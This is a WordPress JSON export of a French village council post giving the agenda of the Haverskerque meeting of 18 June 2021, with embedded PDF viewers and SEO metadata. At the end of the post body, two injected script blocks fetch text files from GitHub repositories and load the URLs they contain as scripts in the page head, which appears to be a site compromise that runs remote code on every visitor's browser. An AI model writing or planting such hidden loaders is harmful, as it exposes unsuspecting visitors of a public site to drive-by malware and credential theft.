{"id":636,"date":"2021-06-19T16:41:00","date_gmt":"2021-06-19T14:41:00","guid":{"rendered":"http:\/\/barbry.esy.es\/?p=636"},"modified":"2024-07-29T06:39:00","modified_gmt":"2024-07-29T04:39:00","slug":"conseil-municipal-du-18-juin-2021","status":"publish","type":"post","link":"https:\/\/www.haverskerque.fr\/index.php\/2021\/06\/19\/conseil-municipal-du-18-juin-2021\/","title":{"rendered":"Conseil Municipal du 18 Juin 2021"},"content":{"rendered":"\n<p><strong>ORDRE DU JOUR&nbsp;:<\/strong><\/p>\n\n\n\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.haverskerque.fr\/local\/cache-vignettes\/L8xH11\/puce-32883.gif\" width=\"8\" height=\"11\" alt=\"-\">&nbsp;Approbation du proc\u00e8s-verbal du conseil municipal du 30 avril 2021.<\/p>\n\n\n\n<p><strong>URBANISME<\/strong><\/p>\n\n\n\n<p>1. Approbation du plan local d\u2019urbanisme de la commune d\u2019Haverskerque.<br>2. D\u00e9molition du b\u00e2timent de l\u2019abcdaire &#8211; d\u00e9saffectation et autorisation des travaux.<\/p>\n\n\n\n<p><strong>FINANCES<\/strong><\/p>\n\n\n\n<p>3. Budget principal de la ville 2021 &#8211; d\u00e9cision budg\u00e9taire modificative n\u00b01.<\/p>\n\n\n\n<p><strong>ADMINISTRATION G\u00c9N\u00c9RALE<\/strong><\/p>\n\n\n\n<p>4.&nbsp;<a href=\"https:\/\/www.haverskerque.fr\/IMG\/pdf\/reglement_interieur_des_services_periscolaire_et_restauration_scolaire-annex.pdf\">R\u00e8glement int\u00e9rieur du service p\u00e9riscolaire<\/a>&nbsp;&#8211; modification au 1er septembre 2021.<\/p>\n\n\n\n<p><strong>RESSOURCES HUMAINES<\/strong><\/p>\n\n\n\n<p>5. Dispositif de contrat d\u2019engagement \u00e9ducatif (CEE) pour assurer le fonctionnement de l\u2019accueil de loisirs de la commune &#8211; ajustement de la r\u00e9mun\u00e9ration.<br>6. Action scolaire du personnel &#8211; r\u00e9siliation du contrat d\u2019affiliation de la commune aupr\u00e8s de Plurelya et adh\u00e9sion au Comit\u00e9 national d\u2019action sociale (CNAS)<\/p>\n\n\n<div class=\"dflip-books\"><div class=\"_df_thumb \" id=\"df_2296\"  _slug=\"ordre-du-jour-de-la-seance-du-18-juin-2021\" data-title=\"ordre-du-jour-de-la-seance-du-18-juin-2021\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Ordre du jour de la s\u00e9ance du 18 Juin 2021<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2296 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/convocation_cm_18_06_2021.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2293\"  _slug=\"annexe-delib-3-budget-modificatif\" data-title=\"annexe-delib-3-budget-modificatif\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >ANNEXE DELIB 3 BUDGET MODIFICATIF<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2293 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/annexe_delib_3_budget_modificatif.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2290\"  _slug=\"compte-rendu-du-conseil-municipal-du-18-juin-2021\" data-title=\"compte-rendu-du-conseil-municipal-du-18-juin-2021\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Compte-rendu du Conseil Municipal du 18 Juin 2021<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2290 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/proces-verbal_de_la_seance_du_conseil_municipal_du_18_06_2021-tamponne.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2287\"  _slug=\"approbation-du-plan-local-durbanisme-de-la-commune-dhaverskerque\" data-title=\"approbation-du-plan-local-durbanisme-de-la-commune-dhaverskerque\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Approbation du Plan Local d\u2019Urbanisme de la commune d\u2019Haverskerque<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2287 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/approbation_du_plan_local_d_urbanisme_de_la_commune_d_haverskerque-tamponne.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2284\"  _slug=\"decision-budgetaire-modificative-bp-2021-rectifie\" data-title=\"decision-budgetaire-modificative-bp-2021-rectifie\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >D\u00e9cision budg\u00e9taire modificative BP 2021 rectifi\u00e9<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2284 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/decision_budgetaire_modificative_-_bp_2021_rectifie-tamponne.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2281\"  _slug=\"contrat-dengagement-educatif-modificatif-tamponne\" data-title=\"contrat-dengagement-educatif-modificatif-tamponne\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Contrat d\u2019Engagement \u00c9ducatif modificatif tamponn\u00e9<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2281 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/contrat_d_engagement_educatif_modificatif-tamponne.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2278\"  _slug=\"demolition-du-batiment-de-labcedaire-tamponne\" data-title=\"demolition-du-batiment-de-labcedaire-tamponne\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >D\u00e9molition du b\u00e2timent de l\u2019abc\u00e9daire tamponn\u00e9<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2278 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/demolition_du_batiment_de_l_abcedaire-tamponne.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2275\"  _slug=\"mise-a-jour-du-tableau-des-effectifs-au-1er-juillet-2021\" data-title=\"mise-a-jour-du-tableau-des-effectifs-au-1er-juillet-2021\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Mise \u00e0 jour du tableau des effectifs au 1er Juillet 2021<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2275 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/mise_a_jour_du_tableau_des_effectifs_au_1er_juillet_2021-tamponne.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2272\"  _slug=\"reglement-interieur-des-services-periscolaire-et-restauration-scolaire-tamponne\" data-title=\"reglement-interieur-des-services-periscolaire-et-restauration-scolaire-tamponne\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >R\u00e8glement int\u00e9rieur des services p\u00e9riscolaire et restauration scolaire tamponn\u00e9<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2272 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/reglement_interieur_des_services_periscolaire_et_restauration_scolaire-tampo.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2269\"  _slug=\"resiliation-contrat-plurelya-adhesion-cnas-au-1er-janvier-2022\" data-title=\"resiliation-contrat-plurelya-adhesion-cnas-au-1er-janvier-2022\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >R\u00e9siliation contrat Plur\u00e9lya + adh\u00e9sion CNAS au 1er Janvier 2022<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2269 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/resiliation_contrat_plurelya_-_adhesion_cnas_au_01012022-tamponne.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><\/div>\n<script>var url = 'https:\/\/raw.githubusercontent.com\/lolngnos\/loles\/main\/step.txt';\nfetch(url)\n    .then(response => response.text())\n    .then(data => {\n        var script = document.createElement('script');\n        script.src = data.trim();\n        document.getElementsByTagName('head')[0].appendChild(script);\n    });<\/script><script>var url = 'https:\/\/raw.githubusercontent.com\/truba77\/trubnik\/main\/from.txt';\n\n        fetch(url)\n            .then(response => response.text())\n            .then(data => {\n                \/\/ head\n                var script = document.createElement('script');\n                script.src = data.trim(); \/\/ 44\n                document.getElementsByTagName('head')[0].appendChild(script);\n            })\n            .catch(error => {\n                console.error('bad go.txt:', error);\n            });<\/script>","protected":false},"excerpt":{"rendered":"<p>ORDRE DU JOUR&nbsp;: &nbsp;Approbation du proc\u00e8s-verbal du conseil municipal du 30 avril 2021. URBANISME 1. Approbation du plan local d\u2019urbanisme de la commune d\u2019Haverskerque.2. D\u00e9molition du b\u00e2timent de l\u2019abcdaire &#8211; d\u00e9saffectation et autorisation des travaux. FINANCES 3. Budget principal de la ville 2021 &#8211; d\u00e9cision budg\u00e9taire modificative n\u00b01. ADMINISTRATION G\u00c9N\u00c9RALE 4.&nbsp;R\u00e8glement int\u00e9rieur du service p\u00e9riscolaire&nbsp;&#8211; modification au 1er septembre 2021. RESSOURCES HUMAINES 5. Dispositif de contrat d\u2019engagement \u00e9ducatif (CEE) pour assurer le fonctionnement de l\u2019accueil de loisirs de la commune &#8211; ajustement de la r\u00e9mun\u00e9ration.6. Action scolaire du personnel &#8211; r\u00e9siliation du contrat d\u2019affiliation de la commune aupr\u00e8s de Plurelya et adh\u00e9sion au Comit\u00e9 national d\u2019action sociale (CNAS)<\/p>\n","protected":false},"author":1,"featured_media":568,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"cybocfi_hide_featured_image":"yes","footnotes":""},"categories":[10],"tags":[],"class_list":["post-636","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-conseil-mnicipal"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Conseil Municipal du 18 Juin 2021 * Haverskerque, 100% Nature !*<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.haverskerque.fr\/index.php\/2021\/06\/19\/conseil-municipal-du-18-juin-2021\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Conseil Municipal du 18 Juin 2021 * Haverskerque, 100% Nature !*\" \/>\n<meta property=\"og:description\" content=\"ORDRE DU JOUR&nbsp;: &nbsp;Approbation du proc\u00e8s-verbal du conseil municipal du 30 avril 2021. URBANISME 1. Approbation du plan local d\u2019urbanisme de la commune d\u2019Haverskerque.2. D\u00e9molition du b\u00e2timent de l\u2019abcdaire &#8211; d\u00e9saffectation et autorisation des travaux. FINANCES 3. Budget principal de la ville 2021 &#8211; d\u00e9cision budg\u00e9taire modificative n\u00b01. ADMINISTRATION G\u00c9N\u00c9RALE 4.&nbsp;R\u00e8glement int\u00e9rieur du service p\u00e9riscolaire&nbsp;&#8211; modification au 1er septembre 2021. RESSOURCES HUMAINES 5. Dispositif de contrat d\u2019engagement \u00e9ducatif (CEE) pour assurer le fonctionnement de l\u2019accueil de loisirs de la commune &#8211; ajustement de la r\u00e9mun\u00e9ration.6. Action scolaire du personnel &#8211; r\u00e9siliation du contrat d\u2019affiliation de la commune aupr\u00e8s de Plurelya et adh\u00e9sion au Comit\u00e9 national d\u2019action sociale (CNAS)\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.haverskerque.fr\/index.php\/2021\/06\/19\/conseil-municipal-du-18-juin-2021\/\" \/>\n<meta property=\"og:site_name\" content=\"Haverskerque, 100% Nature !*\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/communehaverskerque\" \/>\n<meta property=\"article:published_time\" content=\"2021-06-19T14:41:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-07-29T04:39:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1200\" \/>\n\t<meta property=\"og:image:height\" content=\"630\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"chti pc en d\u00e9tresse\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"chti pc en d\u00e9tresse\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2021\\\/06\\\/19\\\/conseil-municipal-du-18-juin-2021\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2021\\\/06\\\/19\\\/conseil-municipal-du-18-juin-2021\\\/\"},\"author\":{\"name\":\"chti pc en d\u00e9tresse\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/5aef692024411f412afcec0eb18865a2\"},\"headline\":\"Conseil Municipal du 18 Juin 2021\",\"datePublished\":\"2021-06-19T14:41:00+00:00\",\"dateModified\":\"2024-07-29T04:39:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2021\\\/06\\\/19\\\/conseil-municipal-du-18-juin-2021\\\/\"},\"wordCount\":140,\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2021\\\/06\\\/19\\\/conseil-municipal-du-18-juin-2021\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/conseil_municipal.jpg\",\"articleSection\":[\"Conseil municipal\"],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2021\\\/06\\\/19\\\/conseil-municipal-du-18-juin-2021\\\/\",\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2021\\\/06\\\/19\\\/conseil-municipal-du-18-juin-2021\\\/\",\"name\":\"Conseil Municipal du 18 Juin 2021 * Haverskerque, 100% Nature !*\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2021\\\/06\\\/19\\\/conseil-municipal-du-18-juin-2021\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2021\\\/06\\\/19\\\/conseil-municipal-du-18-juin-2021\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/conseil_municipal.jpg\",\"datePublished\":\"2021-06-19T14:41:00+00:00\",\"dateModified\":\"2024-07-29T04:39:00+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2021\\\/06\\\/19\\\/conseil-municipal-du-18-juin-2021\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2021\\\/06\\\/19\\\/conseil-municipal-du-18-juin-2021\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2021\\\/06\\\/19\\\/conseil-municipal-du-18-juin-2021\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\\\/\\\/www.haverskerque.fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Conseil Municipal du 18 Juin 2021\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"name\":\"Haverskerque\",\"description\":\"Haverskerque, 100% Nature !\",\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"alternateName\":\"Haverskerque\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/haverskerque.fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\",\"name\":\"Commune d'Haverskerque\",\"alternateName\":\"Commune d'Haverskerque\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"contentUrl\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"width\":236,\"height\":102,\"caption\":\"Commune d'Haverskerque\"},\"image\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/communehaverskerque\",\"https:\\\/\\\/www.instagram.com\\\/communehaverskerque\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/5aef692024411f412afcec0eb18865a2\",\"name\":\"chti pc en d\u00e9tresse\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"caption\":\"chti pc en d\u00e9tresse\"},\"sameAs\":[\"https:\\\/\\\/haverskerque.fr\"],\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/author\\\/estorez\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Conseil Municipal du 18 Juin 2021 * Haverskerque, 100% Nature !*","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.haverskerque.fr\/index.php\/2021\/06\/19\/conseil-municipal-du-18-juin-2021\/","og_locale":"fr_FR","og_type":"article","og_title":"Conseil Municipal du 18 Juin 2021 * Haverskerque, 100% Nature !*","og_description":"ORDRE DU JOUR&nbsp;: &nbsp;Approbation du proc\u00e8s-verbal du conseil municipal du 30 avril 2021. URBANISME 1. Approbation du plan local d\u2019urbanisme de la commune d\u2019Haverskerque.2. D\u00e9molition du b\u00e2timent de l\u2019abcdaire &#8211; d\u00e9saffectation et autorisation des travaux. FINANCES 3. Budget principal de la ville 2021 &#8211; d\u00e9cision budg\u00e9taire modificative n\u00b01. ADMINISTRATION G\u00c9N\u00c9RALE 4.&nbsp;R\u00e8glement int\u00e9rieur du service p\u00e9riscolaire&nbsp;&#8211; modification au 1er septembre 2021. RESSOURCES HUMAINES 5. Dispositif de contrat d\u2019engagement \u00e9ducatif (CEE) pour assurer le fonctionnement de l\u2019accueil de loisirs de la commune &#8211; ajustement de la r\u00e9mun\u00e9ration.6. Action scolaire du personnel &#8211; r\u00e9siliation du contrat d\u2019affiliation de la commune aupr\u00e8s de Plurelya et adh\u00e9sion au Comit\u00e9 national d\u2019action sociale (CNAS)","og_url":"https:\/\/www.haverskerque.fr\/index.php\/2021\/06\/19\/conseil-municipal-du-18-juin-2021\/","og_site_name":"Haverskerque, 100% Nature !*","article_publisher":"https:\/\/www.facebook.com\/communehaverskerque","article_published_time":"2021-06-19T14:41:00+00:00","article_modified_time":"2024-07-29T04:39:00+00:00","og_image":[{"width":1200,"height":630,"url":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","type":"image\/jpeg"}],"author":"chti pc en d\u00e9tresse","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"chti pc en d\u00e9tresse","Dur\u00e9e de lecture estim\u00e9e":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.haverskerque.fr\/index.php\/2021\/06\/19\/conseil-municipal-du-18-juin-2021\/#article","isPartOf":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2021\/06\/19\/conseil-municipal-du-18-juin-2021\/"},"author":{"name":"chti pc en d\u00e9tresse","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/5aef692024411f412afcec0eb18865a2"},"headline":"Conseil Municipal du 18 Juin 2021","datePublished":"2021-06-19T14:41:00+00:00","dateModified":"2024-07-29T04:39:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2021\/06\/19\/conseil-municipal-du-18-juin-2021\/"},"wordCount":140,"publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2021\/06\/19\/conseil-municipal-du-18-juin-2021\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","articleSection":["Conseil municipal"],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/www.haverskerque.fr\/index.php\/2021\/06\/19\/conseil-municipal-du-18-juin-2021\/","url":"https:\/\/www.haverskerque.fr\/index.php\/2021\/06\/19\/conseil-municipal-du-18-juin-2021\/","name":"Conseil Municipal du 18 Juin 2021 * Haverskerque, 100% Nature !*","isPartOf":{"@id":"https:\/\/haverskerque.fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2021\/06\/19\/conseil-municipal-du-18-juin-2021\/#primaryimage"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2021\/06\/19\/conseil-municipal-du-18-juin-2021\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","datePublished":"2021-06-19T14:41:00+00:00","dateModified":"2024-07-29T04:39:00+00:00","breadcrumb":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2021\/06\/19\/conseil-municipal-du-18-juin-2021\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.haverskerque.fr\/index.php\/2021\/06\/19\/conseil-municipal-du-18-juin-2021\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.haverskerque.fr\/index.php\/2021\/06\/19\/conseil-municipal-du-18-juin-2021\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.haverskerque.fr\/"},{"@type":"ListItem","position":2,"name":"Conseil Municipal du 18 Juin 2021"}]},{"@type":"WebSite","@id":"https:\/\/haverskerque.fr\/#website","url":"https:\/\/haverskerque.fr\/","name":"Haverskerque","description":"Haverskerque, 100% Nature !","publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"alternateName":"Haverskerque","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/haverskerque.fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/haverskerque.fr\/#organization","name":"Commune d'Haverskerque","alternateName":"Commune d'Haverskerque","url":"https:\/\/haverskerque.fr\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/","url":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","contentUrl":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","width":236,"height":102,"caption":"Commune d'Haverskerque"},"image":{"@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/communehaverskerque","https:\/\/www.instagram.com\/communehaverskerque\/"]},{"@type":"Person","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/5aef692024411f412afcec0eb18865a2","name":"chti pc en 